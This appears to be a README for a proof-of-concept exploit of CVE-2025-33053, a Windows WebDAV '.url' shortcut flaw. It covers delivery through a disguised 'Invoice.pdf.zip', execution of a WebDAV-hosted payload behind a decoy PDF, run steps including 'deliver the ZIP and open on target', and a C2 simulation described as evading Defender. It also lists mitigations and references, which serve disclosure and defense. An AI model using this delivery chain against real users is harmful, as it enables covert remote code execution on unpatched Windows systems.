Share 
## https://sploitus.com/exploit?id=B8F6B314-8028-5568-A2A7-4AA3A6141AFF
# CVE-2025-33053 - WebDAV Remote Code Execution (RCE) PoC & C2 Simulation

> **⚠️ Educational Purposes Only**
> This project demonstrates a proof-of-concept exploiting WebDAV and `.url` file delivery to achieve realistic remote code execution. It includes a decoy-based executable and a controlled simulation of command-and-control (C2) capabilities. No malicious payloads are shared.

---

## πŸ“œ Summary

This repository contains a PoC for **CVE-2025-33053**, a vulnerability in how Windows handles `.url` files pointing to a WebDAV share. The PoC demonstrates how an attacker could:

* Deliver a `.url` shortcut via ZIP (`Invoice.pdf.zip`)
* Trigger execution of a payload hosted on a WebDAV container
* Open a benign-looking PDF while executing malicious logic in the background
* Optionally simulate C2 behavior (e.g., creating folders)

> The actual C2 code is **not included**  only a demonstration video is provided.

---

## 🎬 Demo Videos

### πŸ”Ή Video 1 β€” Decoy Execution
https://github.com/user-attachments/assets/27ada7f9-9b02-4281-b002-da7afcdffe21

Shows the `.url` file triggering `route.exe`, which opens a fake PDF and displays a popup:

> *"Execution complete. No alerts triggered. You may continue pretending you're safe."*

### πŸ”Ή Video 2 β€” C2 Simulation


https://github.com/user-attachments/assets/d3908eb7-3126-4ec1-ae60-a0373b877a50


Very simple command and control mechanism. Simulates a stealthy C2 by executing remote commands (e.g., creating a folder and calc) fetched via HTTP. No shell, no noise just silent control.
Reverse shells get captured and stopped by the Microsoft Defender. Here as you can see I just edit a file which is accessible to the victim machine and it will be fetched by the machine via http; strip the content then executed. that task is handled by that custom Route.exe

> βœ… Videos available in the `demo/` directory.

---

## πŸ“‚ File Structure

```
CVE-2025-33053/
β”œβ”€β”€ docker-compose.yml                  # WebDAV container config
β”œβ”€β”€ setup_webdav_payload.py                 # Automates setup + zipping
β”œβ”€β”€ Important-Document.pdf.zip         # Contains disguised .url ( After the script )
β”œβ”€β”€ webdav_data/			# ( After the script )
β”‚   └── data/payload/route.exe         # Payload (PDF + logic) 
β”œβ”€β”€ cleanup.sh 				# Docker + Directories + webdav_data cleaner
β”œβ”€β”€ demo/
β”‚   β”œβ”€β”€ 1_decoy_execution.mp4
β”‚   └── 2_c2_simulation.mp4
```

---

## πŸ§ͺ Running the PoC

1. **Clone the repo & navigate to it**

```bash
git clone https://github.com/kra1t0/CVE-2025-33053-WebDAV-RCE-PoC-and-C2-Concept.git
cd CVE-2025-33053-WebDAV-RCE-PoC-and-C2-Concept
```

2. **Run setup script**

```bash
python3 setup_webdav_payload.py
```

> This sets up Docker, creates folders, Moves the pwned.exe, generates `.url`, and packages the `.zip`

4. **Deliver the ZIP and open on target**

* `Invoice.pdf.zip` β†’ user opens / Unzips and double-clicks `.url`
* Execution begins from WebDAV without any warnings
( Sometimes the Microsoft Defender does alert you that this file should be scanned by the admin. )

---
## 🧱 Affected Versions

CVE-2025-33053 affects the following Windows versions:

Windows 10 (1809 – 22H2)

Windows 11 (21H2 – 23H2)

Windows Server 2016 / 2019 / 2022

Systems with WebClient service enabled

Systems where .url files are not blocked or sanitized

**πŸ› οΈ The vulnerability was patched in June 2025 cumulative updates.
You can find [patch links](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33053) in the Microsoft Patch Notes.**

## 🧠 How It Works

1. **The Shortcut Trick**Β The `.url` file launches a trusted Windows utility (`iediagcmd.exe`) but sets its working directory to an attacker-controlled WebDAV share.
2. **DLL/Executable Hijack**Β That utility uses `Process.Start()` to run commands like `route.exe`. Windows looks first in the working directory, allowing the malicious binary from WebDAV to be executed.
3. **Stealth Falcon’s Delivery**Β  In real attacks, APT actors zipped the `.url` into misleadingly named archives (e.g. `...pdf.zip`) and hosted them on trusted domains over HTTPS. The payload chain then delivered a decoy PDF and loaded a custom C2 loader (β€œHorus Agent”) capable of in-memory shellcode injection, process cloaking, and remote commands.
4. **Active Exploitation.**Β The exploit was used in March 2025 against defense organizations in the Middle East. It’s high-impact (CVSS 8.8) and included in CISA’s Known Exploited Vulnerabilities catalog.

---

## πŸ›‘οΈ Mitigation & Defense

| Mitigation Strategy                             | Description                                                                                                               |
| ----------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------- |
| **πŸ”„ Apply Microsoft Patch**                    | June 2025 cumulative updates address CVE‑2025‑33053 across Windows 10/11 and older Server versions.                       |
| **πŸ”’ Disable WebDAV Client**                    | For systems without WebDAV needs (i.e. most modern setups), disable the β€œWebClient” service via Group Policy or registry. |
| **πŸ“₯ Train Users to Avoid Suspicious Archives** | Don’t open `.url` files from ZIP/ISO emails, even if they appear document-like.                                           |
| **πŸ•΅οΈβ€β™€οΈ Monitor WebDAV Traffic**               | Look for outbound UNC connection patterns like `\\<host>@443\DavWWWRoot\...` these may indicate exploitation attempts.        |
| **πŸ›  Deploy WAF/IDS Rules**                     | Block WebDAV-related methods (e.g., `PROPFIND`) or UNC paths to untrusted domains.                                        |
| **βš™οΈ Harden Edge/SmartScreen Policies**         | Restrict handling of `.url` files and archives via browser settings or secure email gateways.                             |

> βœ… **Immediate priority**: install the patch β€” CISA requires federal agencies to remediate by July 1, 2025

---

## ❌ What’s NOT Included

* No C2 command server code
* No reverse shell scripts or malware
* No exploitation of real systems

---

## πŸ”— References

* [Microsoft Patch Notes – June 2025](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33053)
* [CISA KEV Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
* [Elastic Threat Report: Stealth Falcon Exploitation](https://www.elastic.co/blog/stealth-falcon-campaign-2025)
* [CERT-EU Alert](https://cert.europa.eu/article/webdav-url-hijack-apt)
* [Microsoft Defender AV & SmartScreen Advisory](https://learn.microsoft.com/en-us/microsoft-365/security/)

---

Crafted with attention to realism, red team tradecraft, and ethical disclosure by [@kra1t0](https://github.com/kra1t0)

*Precision in Chaos*